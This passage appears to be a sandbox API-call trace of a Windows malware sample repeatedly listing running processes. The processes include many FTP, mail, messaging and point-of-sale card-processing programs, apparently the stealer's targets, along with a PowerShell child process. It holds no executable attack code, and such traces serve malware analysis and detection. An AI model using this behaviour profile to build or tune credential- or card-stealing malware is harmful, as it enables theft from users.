th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0190.696] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0190.727] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0190.744] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0190.748] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0190.750] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0190.752] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0190.754] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0190.756] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0190.758] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0190.760] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0190.763] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0190.764] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0190.766] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0190.768] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0190.770] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0190.772] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0190.774] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0190.815] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0190.817] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0190.820] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0190.822] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0190.824] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0190.826] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0190.828] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0190.830] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0190.832] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0190.833] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0190.835] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0190.837] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0190.839] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0190.841] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0190.843] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0190.845] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0190.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0190.848] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0190.887] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0190.889] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0190.891] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0190.893] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0190.894] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0190.896] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0190.898] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0190.899] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0190.901] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0190.903] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0190.905] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0190.906] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0190.908] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.909] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.912] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0190.913] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.915] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.916] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0190.918] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0190.919] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0190.921] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0190.972] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0190.974] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.976] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0190.977] CloseHandle (hObject=0x17ec) returned 1 [0190.978] Sleep (dwMilliseconds=0x64) [0191.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0191.060] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.062] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.064] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.065] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.067] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.069] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.114] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.116] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.118] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.119] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.121] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.123] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.124] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.126] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.127] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.129] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.130] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.132] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.134] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.135] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.138] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0191.139] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.141] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, 